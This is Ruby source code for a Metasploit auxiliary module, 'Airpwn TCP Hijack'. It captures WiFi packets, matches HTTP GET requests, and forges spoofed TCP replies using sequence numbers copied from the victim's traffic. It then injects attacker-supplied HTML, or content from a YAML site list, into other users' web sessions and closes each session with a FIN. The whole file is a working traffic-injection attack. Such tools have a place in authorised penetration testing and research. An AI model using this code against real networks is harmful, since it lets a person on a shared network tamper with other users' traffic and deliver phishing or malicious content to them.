## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'yaml' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Exploit::Lorcon2 include Msf::Auxiliary::Report def initialize super( 'Name' => 'Airpwn TCP Hijack', 'Description' => %q{ TCP streams are 'protected' only in so much as the sequence number is not guessable. Wifi is shared media. Got your nose. Responses which do not begin with Header: Value assumed to be HTML only and will have Header:Value data prepended. Responses which do not include a Content-Length header will have one generated. }, 'Author' => ['toast', 'dragorn', 'ddz', 'hdm'], 'License' => MSF_LICENSE, 'Actions' => [ [ 'Airpwn' ] ], 'PassiveActions' => [ 'Capture' ], 'DefaultAction' => 'Airpwn' ) register_options( [ OptPath.new('SITELIST', [ false, "YAML file of URL/Replacement pairs for GET replacement", File.join(Msf::Config.data_directory, "exploits", "wifi", "airpwn", "sitelist.yml") ]), OptBool.new('USESITEFILE', [ true, "Use site list file for match/response", "false"]), OptString.new('FILTER', [ true, "Default BPF filter", "port 80"]), OptString.new('MATCH', [ true, "Default request match", "GET ([^ ?]+) HTTP" ]), OptString.new('RESPONSE', [ true, "Default response", "Airpwn" ]), ], self.class) end def run @sitelist = datastore['SITELIST'] @regex = datastore['MATCH'] @response = datastore['RESPONSE'] @filter = datastore['FILTER'] @useyaml = datastore['USESITEFILE'] @http = [] if @useyaml then begin @http = YAML::load_file(@sitelist) rescue ::Exception => e print_error "AIRPWN: failed to parse YAML file, #{e.class} #{e} #{e.backtrace}" end else @http[0] = { "regex" => [@regex], "response" => @response } end @run = true print_status "AIRPWN: Parsing responses and defining headers" # Prep the responses @http.each do |r| if not r["response"] then if not r["file"] then print_error "AIRPWN: Missing 'response' or 'file' in yaml config" r["txresponse"] = "" else r["txresponse"] = "" begin File.open(r["file"], "rb") do |io| r["txresponse"] += io.read(4096) end rescue EOFError rescue ::Exception => e print_error("AIRPWN: failed to parse response file " + "#{r['file']}, #{e.class} #{e} #{e.backtrace}") end end else if r["file"] then print_error "AIRPWN: Both 'response' and 'file' in yaml config, " + "defaulting to 'response'" end r["txresponse"] = r["response"] end # If we have headers if r["txresponse"].scan(/[^:?]+: .+\n/m).size > 0 # But not a content-length if r["txresponse"].scan(/^Content-Length: /).size == 0 # Figure out the length and add it loc = (/\n\n/m =~ r["txresponse"]) if loc == nil print_status "AIRPWN: Response packet looks like HTTP headers but can't find end of headers. Will inject as-is." else print_status "AIRPWN: Response packet looks like HTTP headers but has no Content-Length, adding one." r["txresponse"].insert(loc, "\r\nContent-Length: " + (r["response"].length - loc).to_s) end end else # We have no headers, generate a response print_status "AIRPWN: Response packet has no HTTP headers, creating some." r["txresponse"].insert(0, "HTTP/1.1 200 OK\r\nDate: %s\r\nServer: Apache\r\nConnection: close\r\nContent-Type: text/html\r\nContent-Length: %d\r\n\r\n" % [Time.now, @response.size]) end end print_status "Opening wifi module." open_wifi self.wifi.filter = @filter if (@filter != "") each_packet do |pkt| d3 = pkt.dot3 next if not d3 p = PacketFu::Packet.parse(d3) rescue nil next unless p.is_tcp? @http.each do |r| hit = nil r['regex'].each do |reg| hit = p.payload.scan(/#{reg}/) || nil break if hit.size != 0 end next if hit.size.zero? print_status("AIRPWN: %s -> %s HTTP GET [%s] TCP SEQ %u" % [p.ip_saddr, p.ip_daddr, $1, p.tcp_seq]) injpkt = Lorcon::Packet.new() injpkt.bssid = pkt.bssid response_pkt = PacketFu::TCPPacket.new response_pkt.eth_daddr = p.eth_saddr response_pkt.eth_saddr = p.eth_daddr response_pkt.ip_saddr = p.ip_daddr response_pkt.ip_daddr = p.ip_saddr response_pkt.ip_ttl = p.ip_ttl response_pkt.tcp_sport = p.tcp_dport response_pkt.tcp_dport = p.tcp_sport response_pkt.tcp_win = p.tcp_win response_pkt.tcp_seq = p.tcp_ack response_pkt.tcp_ack = (p.tcp_seq + p.ip_header.body.to_s.size - (p.tcp_hlen * 4)) & 0xffffffff response_pkt.tcp_flags.ack = 1 response_pkt.tcp_flags.psh = 1 response_pkt.payload = r["txresponse"] response_pkt.recalc injpkt.dot3 = response_pkt.to_s case pkt.direction when ::Lorcon::Packet::LORCON_FROM_DS injpkt.direction = Lorcon::Packet::LORCON_TO_DS when ::Lorcon::Packet::LORCON_TO_DS injpkt.direction = Lorcon::Packet::LORCON_FROM_DS else injpkt.direction = Lorcon::Packet::LORCON_ADHOC_DS end self.wifi.inject(injpkt) or print_error("AIRPWN failed to inject packet: " + tx.error) response_pkt.tcp_seq = response_pkt.tcp_seq + response_pkt.payload.size response_pkt.tcp_flags.ack = 1 response_pkt.tcp_flags.psh = 0 response_pkt.tcp_flags.fin = 1 response_pkt.payload = 0 response_pkt.recalc injpkt.dot3 = response_pkt.to_s self.wifi.inject(injpkt) or print_error("AIRPWN failed to inject packet: " + tx.error) end end end end